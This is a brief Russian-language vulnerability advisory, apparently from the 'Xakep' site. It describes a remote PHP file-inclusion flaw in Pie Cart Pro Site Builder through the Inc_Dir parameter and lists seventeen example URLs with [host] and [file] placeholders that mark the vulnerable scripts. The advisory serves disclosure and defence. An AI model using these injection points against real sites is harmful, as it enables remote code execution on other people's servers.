PHP-инклюдинг в Pie Cart Pro Site Builder

Рекомендуем почитать:

Xakep #299. Sysmon

• Содержание выпуска
• Подписка на «Хакер»-60%

Программа: Pie Cart Pro Site Builder

Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный код на уязвимой системе. Уязвимость возникает из-за того, что данные, передаваемые через параметр «Inc_Dir " не правильно обрабатываются в различных сценариях.

Примеры:

http://[host]/affiliates.php?Inc_Dir=[file]
http://[host]/orders.php?Inc_Dir=[file]
http://[host]/events.php?Inc_Dir=[file]
http://[host]/index.php?Inc_Dir=[file]
http://[host]/articles.php?Inc_Dir=[file]
http://[host]/faqs.php?Inc_Dir=[file]
http://[host]/guestbook.php?Inc_Dir=[file]
http://[host]/catalog.php?Inc_Dir=[file]
http://[host]/wholesale.php?Inc_Dir=[file]
http://[host]/weblinks.php?Inc_Dir=[file]
http://[host]/certificates.php?Inc_Dir=[file]
http://[host]/sitesearch.php?Inc_Dir=[file]
http://[host]/contact.php?Inc_Dir=[file]
http://[host]/sitemap.php?Inc_Dir=[file]
http://[host]/search.php?Inc_Dir=[file]
http://[host]/registry.php?Inc_Dir=[file]
http://[host]/error.php?Inc_Dir=[file]